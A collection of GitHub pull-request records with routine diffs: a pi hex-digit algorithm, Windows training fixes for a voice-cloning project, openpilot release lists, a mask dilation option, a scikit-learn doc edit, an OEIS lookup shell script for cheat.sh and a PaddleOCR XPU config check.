+# Proxy checking for Sales Manager availability
+# This Sales Manager will not talk to you whether he/she is busy or not
+# Proxy checking for Sales Manager availability
+# This Sales Manager will not talk to you whether he/she is busy or not
| This modification shows that proxy can be used to block some operations of the other objects. It is a little modification but useful for pattern design.
| https://api.github.com/repos/faif/python-patterns/pulls/81 | 2015-04-18T05:50:28Z | 2015-04-22T16:35:30Z | 2015-04-22T16:35:30Z | 2015-04-22T16:35:30Z | 347 | faif/python-patterns | 33,433 |
Pi digit extraction algorithm | diff --git a/DIRECTORY.md b/DIRECTORY.md
index f4499d8e07bd..bef7bca86cc3 100644
--- a/DIRECTORY.md
+++ b/DIRECTORY.md
@@ -300,6 +300,7 @@
* [Average Mean](https://github.com/TheAlgorithms/Python/blob/master/maths/average_mean.py)
* [Average Median](https://github.com/TheAlgorithms/Python/blob/master/maths/average_median.py)
* [Average Mode](https://github.com/TheAlgorithms/Python/blob/master/maths/average_mode.py)
+ * [Bailey Borwein Plouffe](https://github.com/TheAlgorithms/Python/blob/master/maths/bailey_borwein_plouffe.py)
* [Basic Maths](https://github.com/TheAlgorithms/Python/blob/master/maths/basic_maths.py)
* [Binary Exp Mod](https://github.com/TheAlgorithms/Python/blob/master/maths/binary_exp_mod.py)
* [Binary Exponentiation](https://github.com/TheAlgorithms/Python/blob/master/maths/binary_exponentiation.py)
@@ -603,6 +604,7 @@
* [Shell Sort](https://github.com/TheAlgorithms/Python/blob/master/sorts/shell_sort.py)
* [Sleep Sort](https://github.com/TheAlgorithms/Python/blob/master/sorts/sleep_sort.py)
* [Stooge Sort](https://github.com/TheAlgorithms/Python/blob/master/sorts/stooge_sort.py)
+ * [Strand Sort](https://github.com/TheAlgorithms/Python/blob/master/sorts/strand_sort.py)
* [Tim Sort](https://github.com/TheAlgorithms/Python/blob/master/sorts/tim_sort.py)
* [Topological Sort](https://github.com/TheAlgorithms/Python/blob/master/sorts/topological_sort.py)
* [Tree Sort](https://github.com/TheAlgorithms/Python/blob/master/sorts/tree_sort.py)
diff --git a/maths/bailey_borwein_plouffe.py b/maths/bailey_borwein_plouffe.py
new file mode 100644
index 000000000000..7834668864af
--- /dev/null
+++ b/maths/bailey_borwein_plouffe.py
@@ -0,0 +1,87 @@
+def bailey_borwein_plouffe(digit_position: int, precision: int = 1000) -> str:
+ """
+ Implement a popular pi-digit-extraction algorithm known as the
+ Bailey-Borwein-Plouffe (BBP) formula to calculate the nth hex digit of pi.
+ Wikipedia page:
+ https://en.wikipedia.org/wiki/Bailey%E2%80%93Borwein%E2%80%93Plouffe_formula
+ @param digit_position: a positive integer representing the position of the digit to extract.
+ The digit immediately after the decimal point is located at position 1.
+ @param precision: number of terms in the second summation to calculate.
+ A higher number reduces the chance of an error but increases the runtime.
+ @return: a hexadecimal digit representing the digit at the nth position
+ in pi's decimal expansion.
+
+ >>> "".join(bailey_borwein_plouffe(i) for i in range(1, 11))
+ '243f6a8885'
+ >>> bailey_borwein_plouffe(5, 10000)
+ '6'
+ >>> bailey_borwein_plouffe(-10)
+ Traceback (most recent call last):
+ ...
+ ValueError: Digit position must be a positive integer
+ >>> bailey_borwein_plouffe(0)
+ Traceback (most recent call last):
+ ...
+ ValueError: Digit position must be a positive integer
+ >>> bailey_borwein_plouffe(1.7)
+ Traceback (most recent call last):
+ ...
+ ValueError: Digit position must be a positive integer
+ >>> bailey_borwein_plouffe(2, -10)
+ Traceback (most recent call last):
+ ...
+ ValueError: Precision must be a nonnegative integer
+ >>> bailey_borwein_plouffe(2, 1.6)
+ Traceback (most recent call last):
+ ...
+ ValueError: Precision must be a nonnegative integer
+ """
+ if (not isinstance(digit_position, int)) or (digit_position <= 0):
+ raise ValueError("Digit position must be a positive integer")
+ elif (not isinstance(precision, int)) or (precision < 0):
+ raise ValueError("Please input a nonnegative integer for the precision")
+
+ # compute an approximation of (16 ** (n - 1)) * pi whose fractional part is mostly accurate
+ sum_result = (
+ 4 * _subsum(digit_position, 1, precision)
+ - 2 * _subsum(digit_position, 4, precision)
+ - _subsum(digit_position, 5, precision)
+ - _subsum(digit_position, 6, precision)
+ )
+
+ # return the first hex digit of the fractional part of the result
+ return hex(int((sum_result % 1) * 16))[2:]
+
+
+def _subsum(
+ digit_pos_to_extract: int, denominator_addend: int, precision: int
+) -> float:
+ # only care about first digit of fractional part; don't need decimal
+ """
+ Private helper function to implement the summation
+ functionality.
+ @param digit_pos_to_extract: digit position to extract
+ @param denominator_addend: added to denominator of fractions in the formula
+ @param precision: same as precision in main function
+ @return: floating-point number whose integer part is not important
+ """
+ sum = 0.0
+ for sum_index in range(digit_pos_to_extract + precision):
+ denominator = 8 * sum_index + denominator_addend
+ exponential_term = 0.0
+ if sum_index < digit_pos_to_extract:
+ # if the exponential term is an integer and we mod it by the denominator before
+ # dividing, only the integer part of the sum will change; the fractional part will not
+ exponential_term = pow(
+ 16, digit_pos_to_extract - 1 - sum_index, denominator
+ )
+ else:
+ exponential_term = pow(16, digit_pos_to_extract - 1 - sum_index)
+ sum += exponential_term / denominator
+ return sum
+
+
+if __name__ == "__main__":
+ import doctest
+
+ doctest.testmod()
| ### **Describe your change:**
I added an algorithm that extracts the nth hexadecimal digit of pi
* [X] Add an algorithm?
* [ ] Fix a bug or typo in an existing algorithm?
* [ ] Documentation change?
### **Checklist:**
* [X] I have read [CONTRIBUTING.md](https://github.com/TheAlgorithms/Python/blob/master/CONTRIBUTING.md).
* [X] This pull request is all my own work -- I have not plagiarized.
* [X] I know that pull requests will not be merged if they fail the automated tests.
* [X] This PR only changes one algorithm file. To ease review, please open separate PRs for separate algorithms.
* [X] All new Python files are placed inside an existing directory.
* [X] All filenames are in all lowercase characters with no spaces or dashes.
* [X] All functions and variable names follow Python naming conventions.
* [X] All function parameters and return values are annotated with Python [type hints](https://docs.python.org/3/library/typing.html).
* [X] All functions have [doctests](https://docs.python.org/3/library/doctest.html) that pass the automated testing.
* [X] All new algorithms have a URL in its comments that points to Wikipedia or other similar explanation.
* [X] If this pull request resolves one or more open issues then the commit message contains `Fixes: #{$ISSUE_NO}`.
| https://api.github.com/repos/TheAlgorithms/Python/pulls/1996 | 2020-05-18T06:55:30Z | 2020-05-18T20:54:09Z | 2020-05-18T20:54:09Z | 2020-05-18T20:54:09Z | 1,510 | TheAlgorithms/Python | 30,067 |
Update synthesizer/train.py, vocoder/train.py, synthesizer/synthesize.py, vocoder_preprocess.py to Allow Vocoder_preprocess to Work (Win10 GPU) | diff --git a/README.md b/README.md
index 214e9b3ef..454fb79c7 100644
--- a/README.md
+++ b/README.md
@@ -38,7 +38,7 @@ SV2TTS is a three-stage deep learning framework that allows to create a numerica
**Python 3.6 or 3.7** is needed to run the toolbox.
-* Install [PyTorch](https://pytorch.org/get-started/locally/) (>=1.0.1).
+* Install [PyTorch](https://pytorch.org/get-started/locally/) (>=1.1.0).
* Install [ffmpeg](https://ffmpeg.org/download.html#get-packages).
* Run `pip install -r requirements.txt` to install the remaining necessary packages.
diff --git a/demo_cli.py b/demo_cli.py
index c7309e8e2..d43f04d72 100644
--- a/demo_cli.py
+++ b/demo_cli.py
@@ -43,7 +43,7 @@
if args.cpu:
# Hide GPUs from Pytorch to force CPU processing
- os.environ["CUDA_VISIBLE_DEVICES"] = ""
+ os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
if not args.no_mp3_support:
try:
diff --git a/demo_toolbox.py b/demo_toolbox.py
index d93803141..ea30a2927 100644
--- a/demo_toolbox.py
+++ b/demo_toolbox.py
@@ -32,7 +32,7 @@
if args.cpu:
# Hide GPUs from Pytorch to force CPU processing
- os.environ["CUDA_VISIBLE_DEVICES"] = ""
+ os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
del args.cpu
## Remind the user to download pretrained models if needed
diff --git a/synthesizer/synthesize.py b/synthesizer/synthesize.py
index ff05d0eb8..ffc7dc267 100644
--- a/synthesizer/synthesize.py
+++ b/synthesizer/synthesize.py
@@ -8,13 +8,13 @@
import numpy as np
from pathlib import Path
from tqdm import tqdm
-
+import platform
def run_synthesis(in_dir, out_dir, model_dir, hparams):
# This generates ground truth-aligned mels for vocoder training
synth_dir = Path(out_dir).joinpath("mels_gta")
synth_dir.mkdir(exist_ok=True)
- print(hparams_debug_string(hparams))
+ print(hparams_debug_string())
# Check for GPU
if torch.cuda.is_available():
@@ -62,9 +62,9 @@ def run_synthesis(in_dir, out_dir, model_dir, hparams):
dataset = SynthesizerDataset(metadata_fpath, mel_dir, embed_dir, hparams)
data_loader = DataLoader(dataset,
- collate_fn=lambda batch: collate_synthesizer(batch, r),
+ collate_fn=lambda batch: collate_synthesizer(batch, r, hparams),
batch_size=hparams.synthesis_batch_size,
- num_workers=2,
+ num_workers=2 if platform.system() != "Windows" else 0,
shuffle=False,
pin_memory=True)
@@ -80,7 +80,7 @@ def run_synthesis(in_dir, out_dir, model_dir, hparams):
if device.type == "cuda" and torch.cuda.device_count() > 1:
_, mels_out, _ = data_parallel_workaround(model, texts, mels, embeds)
else:
- _, mels_out, _ = model(texts, mels, embeds)
+ _, mels_out, _, _ = model(texts, mels, embeds)
for j, k in enumerate(idx):
# Note: outputs mel-spectrogram files and target ones have same names, just different folders
diff --git a/synthesizer/train.py b/synthesizer/train.py
index 786e5d0d6..a136cf9b3 100644
--- a/synthesizer/train.py
+++ b/synthesizer/train.py
@@ -15,6 +15,7 @@
from pathlib import Path
import sys
import time
+import platform
def np_now(x: torch.Tensor): return x.detach().cpu().numpy()
@@ -146,7 +147,7 @@ def train(run_id: str, syn_dir: str, models_dir: str, save_every: int,
data_loader = DataLoader(dataset,
collate_fn=lambda batch: collate_synthesizer(batch, r, hparams),
batch_size=batch_size,
- num_workers=2,
+ num_workers=2 if platform.system() != "Windows" else 0,
shuffle=True,
pin_memory=True)
diff --git a/vocoder/train.py b/vocoder/train.py
index 491246937..6dc2f892e 100644
--- a/vocoder/train.py
+++ b/vocoder/train.py
@@ -11,7 +11,7 @@
import numpy as np
import time
import torch
-
+import platform
def train(run_id: str, syn_dir: Path, voc_dir: Path, models_dir: Path, ground_truth: bool,
save_every: int, backup_every: int, force_restart: bool):
@@ -79,7 +79,7 @@ def train(run_id: str, syn_dir: Path, voc_dir: Path, models_dir: Path, ground_tr
data_loader = DataLoader(dataset,
collate_fn=collate_vocoder,
batch_size=hp.voc_batch_size,
- num_workers=2,
+ num_workers=2 if platform.system() != "Windows" else 0,
shuffle=True,
pin_memory=True)
start = time.time()
diff --git a/vocoder_preprocess.py b/vocoder_preprocess.py
index 0828d72e4..7ede3dfb9 100644
--- a/vocoder_preprocess.py
+++ b/vocoder_preprocess.py
@@ -43,7 +43,7 @@ class MyFormatter(argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptio
if args.cpu:
# Hide GPUs from Pytorch to force CPU processing
- os.environ["CUDA_VISIBLE_DEVICES"] = ""
+ os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# Verify webrtcvad is available
if not args.no_trim:
| Pull requested by @blue-fish
@tomcattwo edited synthesizer/train.py per issue #669 and blue-fish/Real-Time-Voice-Cloning@89a9964 to fix Win10 pickle issue.
This will allow Windows users using a GPU to properly run synthesizer training. | https://api.github.com/repos/CorentinJ/Real-Time-Voice-Cloning/pulls/838 | 2021-09-01T16:02:55Z | 2021-09-25T16:57:12Z | 2021-09-25T16:57:12Z | 2021-09-25T16:57:30Z | 1,400 | CorentinJ/Real-Time-Voice-Cloning | 27,390 |
fixup release files | diff --git a/release/build_release3.sh b/release/build_release3.sh
index 35f17d0cec4b16..5664d984f7fbf3 100755
--- a/release/build_release3.sh
+++ b/release/build_release3.sh
@@ -1,8 +1,10 @@
#!/usr/bin/bash -e
+# git diff --name-status origin/release3-staging | grep "^A" | less
+
DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" >/dev/null && pwd)"
-BUILD_DIR=/data/releasepilot
+BUILD_DIR=/data/openpilot
SOURCE_DIR="$(git rev-parse --show-toplevel)"
BRANCH=release3-staging
diff --git a/release/files_common b/release/files_common
index ae126effe80363..3a52a9f715c75e 100644
--- a/release/files_common
+++ b/release/files_common
@@ -436,7 +436,10 @@ selfdrive/modeld/runners/run.h
selfdrive/monitoring/dmonitoringd.py
selfdrive/monitoring/driver_monitor.py
+selfdrive/assets/.gitignore
+selfdrive/assets/assets.qrc
selfdrive/assets/*.png
+selfdrive/assets/*.svg
selfdrive/assets/fonts/*.ttf
selfdrive/assets/images/*
selfdrive/assets/offroad/*
diff --git a/release/files_tici b/release/files_tici
index 14fdf252e70760..bf4e3afb589799 100644
--- a/release/files_tici
+++ b/release/files_tici
@@ -1,5 +1,9 @@
installer/continue_openpilot.sh
+phonelibs/mapbox-gl-native-qt/include/*
+
+selfdrive/timezoned.py
+
selfdrive/assets/navigation/*
selfdrive/assets/training_wide/*
@@ -15,4 +19,7 @@ selfdrive/hardware/tici/agnos.py
selfdrive/hardware/tici/agnos.json
selfdrive/hardware/tici/amplifier.py
-selfdrive/timezoned.py
+selfdrive/ui/qt/spinner_larch64
+selfdrive/ui/qt/text_larch64
+selfdrive/ui/qt/maps/*.cc
+selfdrive/ui/qt/maps/*.h
| https://api.github.com/repos/commaai/openpilot/pulls/21638 | 2021-07-18T00:17:19Z | 2021-07-18T00:24:09Z | 2021-07-18T00:24:09Z | 2021-07-18T00:24:09Z | 471 | commaai/openpilot | 9,329 |
|
Allows applying dilation by passing negative erosion kernel values. If value is negative, … | diff --git a/plugins/Convert_Masked.py b/plugins/Convert_Masked.py
index d54a534f33..d2f6fc2c22 100644
--- a/plugins/Convert_Masked.py
+++ b/plugins/Convert_Masked.py
@@ -8,11 +8,13 @@
class Convert():
def __init__(self, encoder, blur_size=2, seamless_clone=False, mask_type="facehullandrect", erosion_kernel_size=None, **kwargs):
self.encoder = encoder
-
self.erosion_kernel = None
+ self.erosion_kernel_size = erosion_kernel_size
if erosion_kernel_size is not None:
- self.erosion_kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(erosion_kernel_size,erosion_kernel_size))
-
+ if erosion_kernel_size > 0:
+ self.erosion_kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(erosion_kernel_size,erosion_kernel_size))
+ elif erosion_kernel_size < 0:
+ self.erosion_kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(abs(erosion_kernel_size),abs(erosion_kernel_size)))
self.blur_size = blur_size
self.seamless_clone = seamless_clone
self.mask_type = mask_type.lower() # Choose in 'FaceHullAndRect','FaceHull','Rect'
@@ -86,7 +88,11 @@ def get_image_mask(self, image, new_face, face_detected, mat, image_size):
if self.erosion_kernel is not None:
- image_mask = cv2.erode(image_mask,self.erosion_kernel,iterations = 1)
+ if self.erosion_kernel_size > 0:
+ image_mask = cv2.erode(image_mask,self.erosion_kernel,iterations = 1)
+ elif self.erosion_kernel_size < 0:
+ dilation_kernel = abs(self.erosion_kernel)
+ image_mask = cv2.dilate(image_mask,dilation_kernel,iterations = 1)
if self.blur_size!=0:
image_mask = cv2.blur(image_mask,(self.blur_size,self.blur_size))
diff --git a/scripts/convert.py b/scripts/convert.py
index dbde363d9b..f10ffba7bf 100644
--- a/scripts/convert.py
+++ b/scripts/convert.py
@@ -97,7 +97,8 @@ def add_optional_arguments(self, parser):
dest="erosion_kernel_size",
type=int,
default=None,
- help="Erosion kernel size. (Masked converter only)")
+ help="Erosion kernel size. (Masked converter only). Positive values apply erosion which reduces the edge \
+ of the swapped face. Negative values apply dilation which allows the swapped face to cover more space.")
parser.add_argument('-sm', '--smooth-mask',
action="store_true",
| …it turns it into a dilation kernel, which allows facehullandrect to cover more space. Can help to cover double eyebrows. Also could be useful with Masked converter for GAN in @oatssss PR. | https://api.github.com/repos/deepfakes/faceswap/pulls/238 | 2018-03-03T03:43:39Z | 2018-03-03T11:01:08Z | 2018-03-03T11:01:08Z | 2018-03-03T20:47:47Z | 647 | deepfakes/faceswap | 18,819 |
DOC remove unimplemented misclassification criterion from user guide | diff --git a/doc/modules/tree.rst b/doc/modules/tree.rst
index 951bab0e815b1..6cf8e0d8f5a9a 100644
--- a/doc/modules/tree.rst
+++ b/doc/modules/tree.rst
@@ -500,12 +500,6 @@ Entropy:
H(Q_m) = - \sum_k p_{mk} \log(p_{mk})
-Misclassification:
-
-.. math::
-
- H(Q_m) = 1 - \max(p_{mk})
-
Regression criteria
-------------------
| We do not implement this criterion in scikit-learn.
This part of the scikit-learn user guide uses the notation and criterion presented page 309 of the [ESLII](https://hastie.su.domains/Papers/ESLII.pdf) but is it not aligned with the list of options actually implemented in scikit-learn.
If we ever decide to implement it, we can always re-add this doc but I suspect this is a YAGNI. | https://api.github.com/repos/scikit-learn/scikit-learn/pulls/23071 | 2022-04-07T13:03:02Z | 2022-04-07T14:01:13Z | 2022-04-07T14:01:13Z | 2022-04-07T15:11:24Z | 127 | scikit-learn/scikit-learn | 46,067 |
Restructure for text parsing. Faster, more stable, more maintainable | diff --git a/share/adapters/oeis.sh b/share/adapters/oeis.sh
index 7d996904..fc5136af 100755
--- a/share/adapters/oeis.sh
+++ b/share/adapters/oeis.sh
@@ -8,148 +8,173 @@
# oeis <sequence ID> <language>
# oeis <val_a, val_b, val_c, ...>
oeis() (
- local URL='https://oeis.org'
+ local URL='https://oeis.org/search?q='
local TMP=/tmp/oeis
local DOC=/tmp/oeis/doc.html
- local MAX_TERMS=10
+ local MAX_TERMS_LONG=30
+ local MAX_TERMS_SHORT=10
mkdir -p $TMP
- # -- get_desc --
- # @return print description of OEIS sequence
- get_desc() {
- grep -A 1 '<td valign=top align=left>' $DOC \
- | sed '/<td valign=top align=left>/d; /--/d; s/^[ \t]*//; s/<[^>]*>//g;' \
- | sed 's/ / /g; s/\&/\&/g; s/>/>/g; s/</</g; s/"/"/g'
- return $?
- }
- # -- get_seq --
- # @param MAX_TERMS
- # @return Print the first MAX_TERMS terms of a sequence
- get_seq() {
- local MAX_TERMS=${1}
- grep -o '<tt>.*, .*[0-9]</tt>' $DOC \
- | sed 's/<[^>]*>//g' \
- | grep -v '[a-z]' \
- | grep -v ':' \
- | cut -d ',' -f 1-${MAX_TERMS}
- return $?
- }
- # -- parse_code --
- # @param GREP_REGEX
- # @return Code snippet that corresponds to GREP_REGEX
- parse_code() {
- local GREP_REGEX="${1}"
- cat $DOC \
- | tr '\n' '`' \
- | grep -o "${GREP_REGEX}" \
- | tr '`' '\n' \
- | sed 's/^[ \t]*//; s/<[^>]*>//g; /^\s*$/d;' \
- | sed 's/ / /g; s/\&/\&/g; s/>/>/g; s/</</g; s/"/"/g'
- return $?
- }
+ rm -f ${TMP}/authors ${TMP}/bibliograpy ${TMP}/section $TMP/code_snippet
# -- MAIN --
# Search sequence by ID (optional language arg)
# . oeis <SEQ_ID>
- # . oeis <SEQ_ID> <LANGUAGE>
- # . oeis <LANGUAGE> <SEQ_ID>
+ # . oeis <SEQ_ID> <SECTION>
+ # . oeis <SECTION> <SEQ_ID>
isNum='^[0-9]+$'
- if [ $# -lt 3 ] && [[ ${1:1} =~ $isNum || ${2:1} =~ $isNum || ${1} =~ $isNum || ${2} =~ $isNum ]] && ! echo $1 | grep -q '[0-9]' || ! echo $2 | grep -q '[0-9]'
+ # Search for specific sequence (and potentially language or :SECTION (list)
+ if [ $# -ge 1 ] \
+ && [[ $(echo $1 | tr -d 'aA') =~ $isNum || $(echo $2 | tr -d 'aA') =~ $isNum ]] \
+ && [[ ! $(echo $1 | tr -d 'aA') =~ $isNum || ! $(echo $2 | tr -d 'aA') =~ $isNum ]]
then
# Arg-Parse ID, Generate URL
- if echo ${1^^} | grep -q '[B-Z]'
+ if [[ $(echo $1 | tr -d 'aA') =~ $isNum ]]
then
- ID=${2^^}
- LANGUAGE=$1
- else
ID=${1^^}
- LANGUAGE=$2
+ SECTION=$2
+ else
+ ID=${2^^}
+ SECTION=$1
fi
[[ ${ID:0:1} == 'A' ]] && ID=${ID:1}
ID=$(bc <<< "$ID")
ID="A$(printf '%06d' ${ID})"
- URL+="/${ID}"
+ URL+="id:${ID}&fmt=text"
curl $URL 2>/dev/null > $DOC
- # Print Code Sample
- if [[ ${LANGUAGE^^} == ':LIST' ]]
+ # :list available language code_snippets
+ if [[ ${SECTION^^} == ':LIST' || ${SECTION^^} == ':PROG' ]]
then
- rm -f ${TMP}/list
- grep -q 'MAPLE' $DOC && printf 'maple\n' >> $TMP/list
- grep -q 'MATHEMATICA' $DOC && printf 'mathematica\n' >> $TMP/list
- parse_code 'PROG.*CROSSREFS' \
- | grep -o '^(.*)' \
- | sed 's/ .*//g' \
- | tr -d '()' \
- | sort -u >> $TMP/list
- [ $(wc -c < $TMP/list) -ne 0 ] && cat ${TMP}/list || printf 'No code snippets available.\n'
+ grep -q '%p' $DOC && echo 'maple' >> $TMP/section
+ grep -q '%t' $DOC && echo 'mathematica' >> $TMP/section
+ grep '%o' $DOC \
+ | grep "${ID} (" \
+ | sed "s/^.*${ID} (//; s/).*//" \
+ | awk 'NF == 1' \
+ >> $TMP/section
+ [[ -f $TMP/section && $(wc -c < $TMP/section) -ne 0 ]] \
+ && cat ${TMP}/section | sort -u \
+ || printf 'No code snippets available.\n'
return 0
fi
- # Print ID, description, and sequence
+ # Print ID
printf "ID: ${ID}\n"
- get_desc
- printf '\n'
- get_seq ${MAX_TERMS}
+ # Print Description (%N)
+ grep '%N' $DOC | sed "s/^.*${ID} //"
printf '\n'
+ # Print Sequence (Three sections %S %T nd %U)
+ grep '%S' $DOC | sed "s/^.*${ID} //" | tr -d '\n' > $TMP/seq
+ grep '%T' $DOC | sed "s/^.*${ID} //" | tr -d '\n' >> $TMP/seq
+ grep '%U' $DOC | sed "s/^.*${ID} //" | tr -d '\n' >> $TMP/seq
+ cat $TMP/seq \
+ | cut -d ',' -f 1-${MAX_TERMS_LONG} \
+ | sed 's/,/, /g; s/$/ .../'
+ # Generate code snippet (%p, %t, %o) (maple, mathematica, prog sections)
if [ $# -gt 1 ]
then
- if [[ ${LANGUAGE^^} == 'MAPLE' ]] && grep -q 'MAPLE' $DOC
+ printf "\n\n"
+ # MAPLE section (%p)
+ if [[ ${SECTION^^} == 'MAPLE' ]] && grep -q '%p' $DOC
then
- GREP_REGEX='MAPLE.*CROSSREFS'
- grep -q 'PROG' $DOC && GREP_REGEX='MAPLE.*PROG'
- grep -q 'MATHEMATICA' $DOC && GREP_REGEX='MAPLE.*MATHEMATICA'
- parse_code "${GREP_REGEX}" \
- | sed 's/MAPLE/(MAPLE)/; /MATHEMATICA/d; /PROG/d; /CROSSREFS/d' \
- > ${TMP}/code_snippet
- elif [[ ${LANGUAGE^^} == 'MATHEMATICA' ]] && grep -q 'MATHEMATICA' $DOC
+ grep '%p' $DOC | sed "s/^.*${ID} //" > $TMP/code_snippet
+ # MATHEMATICA section (%t)
+ elif [[ ${SECTION^^} == 'MATHEMATICA' ]] && grep -q '%t' $DOC
+ then
+ grep '%t' $DOC | sed "s/^.*${ID} //" > $TMP/code_snippet
+ # PROG section (%o)
+ elif grep -qi '%o' $DOC && grep -qi $SECTION $DOC
then
- GREP_REGEX='MATHEMATICA.*CROSSREFS'
- grep -q 'PROG' $DOC && GREP_REGEX='MATHEMATICA.*PROG'
- parse_code "${GREP_REGEX}" \
- | sed 's/MATHEMATICA/(MATHEMATICA)/; /PROG/d; /CROSSREFS/d' \
- > ${TMP}/code_snippet
- else
- # PROG section contains more code samples (Non Mathematica or Maple)
- parse_code 'PROG.*CROSSREFS' \
- | sed '/PROG/d; /CROSSREFS/d' \
- > ${TMP}/prog
# Print out code sample for specified language
- rm -f ${TMP}/code_snippet
- awk -v tgt="${LANGUAGE^^}" -F'[()]' '/^\(/{f=(tgt==toupper($2))} f' ${TMP}/prog > ${TMP}/code_snippet
+ grep '%o' $DOC \
+ | sed "s/%o ${ID} //" \
+ | awk -v tgt="${SECTION^^}" -F'[()]' '{act=$2} sub(/^\([^()]+\) */,""){f=(tgt==toupper(act))} f' \
+ > ${TMP}/code_snippet
fi
# Print code snippet with 4-space indent to enable colorization
- if [ $(wc -c < $TMP/code_snippet) -ne 0 ]
+ if [[ -f $TMP/code_snippet && $(wc -c < $TMP/code_snippet) -ne 0 ]]
then
- printf "${LANGUAGE}"
+ # Get authors
+ cat ${TMP}/code_snippet \
+ | grep -o ' _[A-Z].* [A-Z].*_, [A-Z].*[0-9]' \
+ | sort -u \
+ > ${TMP}/authors
+ i=1
+ # Replace authors with numbers
+ while read author
+ do
+ author=$(<<<"$author" sed 's/[]\\\*\(\.[]/\\&/g')
+ sed -i "s|${author}|[${i}]|" ${TMP}/code_snippet
+ echo "[${i}] [${author}]" | tr -d '_' >> ${TMP}/bibliograpy
+ let i++
+ done <${TMP}/authors
+ # Print snippet
cat ${TMP}/code_snippet \
- | sed "s/(${LANGUAGE^^})/\n/; s/(${LANGUAGE})/\n/;" \
| sed 's/^/ /'
else
- printf "${LANGUAGE^^} unavailable. Use :list to view available languages.\n"
+ printf "${SECTION^^} unavailable. Use :list to view available languages.\n"
fi
fi
# Search unknown sequence
- else
+ elif [ $# -gt 1 ] && ! echo $@ | grep -q -e [a-z] -e [A-Z]
+ then
# Build URL
- URL+="/search?q=signed:$(echo $@ | tr -sc '[:digit:]-' ',')"
+ URL+="signed:$(echo $@ | tr -sc '[:digit:]-' ',')&fmt=short"
curl $URL 2>/dev/null > $DOC
# Sequence IDs
- grep -o '=id:.*&' $DOC \
- | sed 's/=id://; s/&//' > $TMP/id
- # Descriptions
- get_desc > $TMP/desc
- # Sequences
- get_seq ${MAX_TERMS} > $TMP/seq
- # Print data for all
+ grep -o '"/A[0-9][0-9][0-9][0-9][0-9][0-9]">A[0-9][0-9][0-9][0-9][0-9][0-9]' $DOC \
+ | sed 's/.*>//' \
+ > $TMP/id
readarray -t ID < $TMP/id
+ # Descriptions
+ grep -A 1 '<td valign=top align=left>' $DOC \
+ | sed '/--/d; s/<[^>]*>//g; /^\s*$/d; s/^[ \t]*//' \
+ | sed 's/ / /g; s/\&/\&/g; s/>/>/g; s/</</g; s/"/"/g' \
+ > $TMP/desc
readarray -t DESC < $TMP/desc
+ # Sequences
+ grep 'style="color:black;font-size:120%' $DOC \
+ | sed 's/<[^>]*>//g; s/^[ \t]*//' \
+ | cut -d ',' -f 1-${MAX_TERMS_SHORT} \
+ | sed 's/,/, /g; s/$/ .../' \
+ > $TMP/seq
readarray -t SEQ < $TMP/seq
+ # Print all ID, DESC, SEQ
for i in ${!ID[@]}
do
printf "${ID[$i]}: ${DESC[$i]}\n"
printf "${SEQ[$i]}\n\n"
done
+ else
+ printf "
+# oeis
+#
+# The On-Line Encyclopedia of Integer Sequences (OEIS),
+# also cited simply as Sloane's, is an online database of integer sequences.
+
+# Find all possible OEIS sequences for some sequence (1,1,1,1...)
+curl cheat.sh/oeis/1+1+1+1
+
+# Describe an OEIS sequence (A2)
+curl cheat.sh/oeis/A2
+
+# Implementation of the A2 OEIS sequence in Python
+curl cheat.sh/oeis/A2/python
+
+# List all available implementations of the A2 OEIS sequence
+curl cheat.sh/oeis/A2/:list
+"
+ return 1
fi
- grep 'results, too many to show. Please refine your search.' /tmp/oeis/doc.html | sed -e 's/<[^>]*>//g; s/^[ \t]*//'
+ # Error statements
+ grep 'results, too many to show. Please refine your search.' $DOC | sed -e 's/<[^>]*>//g; s/^[ \t]*//'
+ grep -o 'Sorry, but the terms do not match anything in the table.' $DOC
+ # print bibliography
+ printf "\n\n"
+ [ -f ${TMP}/bibliograpy ] && cat ${TMP}/bibliograpy
# Print URL for user
- printf "\n[${URL}]\n" | rev | sed 's/,//' | rev
+ printf "[${URL}]\n" \
+ | rev \
+ | sed 's/,//' \
+ | rev \
+ | sed 's/&.*/]/'
)
oeis $@
| #187 | https://api.github.com/repos/chubin/cheat.sh/pulls/215 | 2020-06-27T17:28:03Z | 2020-07-02T19:38:26Z | 2020-07-02T19:38:26Z | 2020-07-06T04:40:40Z | 3,630 | chubin/cheat.sh | 15,189 |
add use_xpu config for det_mv3_db.yml | diff --git a/configs/det/det_mv3_db.yml b/configs/det/det_mv3_db.yml
index 1fab509d12..6edf0b9194 100644
--- a/configs/det/det_mv3_db.yml
+++ b/configs/det/det_mv3_db.yml
@@ -1,5 +1,6 @@
Global:
use_gpu: true
+ use_xpu: false
epoch_num: 1200
log_smooth_window: 20
print_batch_step: 10
diff --git a/tools/program.py b/tools/program.py
index c5b0e69b2d..e92bef3300 100755
--- a/tools/program.py
+++ b/tools/program.py
@@ -130,6 +130,25 @@ def check_gpu(use_gpu):
pass
+def check_xpu(use_xpu):
+ """
+ Log error and exit when set use_xpu=true in paddlepaddle
+ cpu/gpu version.
+ """
+ err = "Config use_xpu cannot be set as true while you are " \
+ "using paddlepaddle cpu/gpu version ! \nPlease try: \n" \
+ "\t1. Install paddlepaddle-xpu to run model on XPU \n" \
+ "\t2. Set use_xpu as false in config file to run " \
+ "model on CPU/GPU"
+
+ try:
+ if use_xpu and not paddle.is_compiled_with_xpu():
+ print(err)
+ sys.exit(1)
+ except Exception as e:
+ pass
+
+
def train(config,
train_dataloader,
valid_dataloader,
@@ -512,6 +531,12 @@ def preprocess(is_train=False):
use_gpu = config['Global']['use_gpu']
check_gpu(use_gpu)
+ # check if set use_xpu=True in paddlepaddle cpu/gpu version
+ use_xpu = False
+ if 'use_xpu' in config['Global']:
+ use_xpu = config['Global']['use_xpu']
+ check_xpu(use_xpu)
+
alg = config['Architecture']['algorithm']
assert alg in [
'EAST', 'DB', 'SAST', 'Rosetta', 'CRNN', 'STARNet', 'RARE', 'SRN',
@@ -519,7 +544,11 @@ def preprocess(is_train=False):
'SEED', 'SDMGR', 'LayoutXLM', 'LayoutLM'
]
- device = 'gpu:{}'.format(dist.ParallelEnv().dev_id) if use_gpu else 'cpu'
+ device = 'cpu'
+ if use_gpu:
